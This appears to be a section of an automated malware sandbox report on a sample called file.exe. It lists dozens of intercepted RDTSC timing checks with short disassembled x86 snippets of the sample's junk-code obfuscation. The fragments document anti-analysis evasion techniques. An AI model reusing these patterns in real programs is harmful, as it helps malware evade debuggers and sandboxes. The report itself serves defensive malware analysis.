              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95957C second address: 95959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD979248A88h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95959E second address: 9595A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95971B second address: 959725 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959725 second address: 959729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959987 second address: 9599AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD979248A87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jne 00007FD979248A76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9599AD second address: 9599B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EBD0 second address: 95EC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FD979248A76h 0x0000000e jmp 00007FD979248A81h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD979248A88h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EC0A second address: 95EC39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD978BA9B39h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E373 second address: 95E377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E377 second address: 95E391 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B16h 0x00000008 jmp 00007FD978BA9B20h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E66A second address: 95E686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD979248A7Bh 0x0000000f jne 00007FD979248A76h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E686 second address: 95E68B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E68B second address: 95E691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E982 second address: 95E987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E987 second address: 95E994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E994 second address: 95E99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962F6D second address: 962F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962F71 second address: 962F96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FD978BA9B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD978BA9B1Eh 0x00000012 jp 00007FD978BA9B16h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pushad 0x0000001b jg 00007FD978BA9B16h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F180 second address: 90F1E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ch, bl 0x0000000d mov ebx, dword ptr [ebp+12482221h] 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD979248A78h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1B71h], ecx 0x00000033 add eax, ebx 0x00000035 call 00007FD979248A85h 0x0000003a ja 00007FD979248A7Ch 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683DE second address: 9683EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683EF second address: 968403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9686BF second address: 9686EB instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B16h 0x00000008 jng 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD978BA9B22h 0x00000019 jo 00007FD978BA9B16h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9686EB second address: 9686F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96887C second address: 968880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689E4 second address: 9689F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FD979248A76h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689F3 second address: 9689F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689F7 second address: 9689FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689FD second address: 968A1E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B1Ah 0x00000008 jmp 00007FD978BA9B1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968A1E second address: 968A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0F90 second address: 8D0FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD978BA9B1Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F628 second address: 96F62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F62E second address: 96F64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B20h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD978BA9B16h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F64D second address: 96F66A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAA6 second address: 96FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAAA second address: 96FAC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A84h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAC2 second address: 96FACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708BC second address: 9708C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708C2 second address: 9708CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD978BA9B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708CC second address: 9708D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708D0 second address: 9708DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708DC second address: 9708E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972A22 second address: 972A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972A2E second address: 972A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976979 second address: 976983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C41 second address: 975C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD979465336h 0x0000000a jmp 00007FD979465345h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C61 second address: 975C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C67 second address: 975C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975F08 second address: 975F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764D9 second address: 9764DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764DD second address: 9764F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD9790E7D60h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764F7 second address: 976501 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD979465336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976501 second address: 97650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976697 second address: 97669B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B2E0 second address: 97B30C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D65h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FD9790E7D61h 0x00000011 jmp 00007FD9790E7D5Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DCF second address: 981DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DD5 second address: 981DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DDB second address: 981DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FD979465336h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DED second address: 981DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DF2 second address: 981DFC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD97946533Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DFC second address: 981E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jns 00007FD9790E7D56h 0x00000011 jp 00007FD9790E7D56h 0x00000017 pop edi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 980C45 second address: 980C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985380 second address: 98539E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9790E7D68h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98539E second address: 9853A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853A3 second address: 9853C9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD9790E7D6Dh 0x00000008 jmp 00007FD9790E7D67h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853C9 second address: 9853DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007FD97946533Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853DA second address: 9853DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98521F second address: 98522F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD93D second address: 8CD947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD947 second address: 8CD957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnp 00007FD979465336h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C40 second address: 998C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998803 second address: 998809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADB3 second address: 99ADCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9790E7D64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADCB second address: 99ADCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADCF second address: 99ADD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A941 second address: 99A945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A945 second address: 99A95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A95A second address: 99A97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD97946534Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EB42 second address: 99EB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD9790E7D5Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007FD9790E7D56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4B9A second address: 9A4BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979465349h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4BBB second address: 9A4BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA56C second address: 9AA57A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA57A second address: 9AA588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD9790E7D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84BC second address: 9B84D7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD97946533Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84D7 second address: 9B84DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84DC second address: 9B84EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD97946533Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B742A second address: 9B7437 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B783D second address: 9B7855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979465342h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7855 second address: 9B7864 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD9790E7D56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8241 second address: 9B8247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8247 second address: 9B824B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAEAC second address: 9BAEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAEB9 second address: 9BAEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAD4D second address: 9BAD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAD51 second address: 9BAD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CAE9A second address: 9CAEC2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD97946533Ch 0x00000008 jnl 00007FD979465336h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007FD97946534Eh 0x00000016 jp 00007FD97946533Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8CB5 second address: 9D8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FD9790E7D62h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F26EE second address: 9F26F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F26F6 second address: 9F26FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1869 second address: 9F18B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FD979465336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FD97946534Ch 0x00000012 jng 00007FD979465348h 0x00000018 jmp 00007FD979465342h 0x0000001d popad 0x0000001e je 00007FD979465354h 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
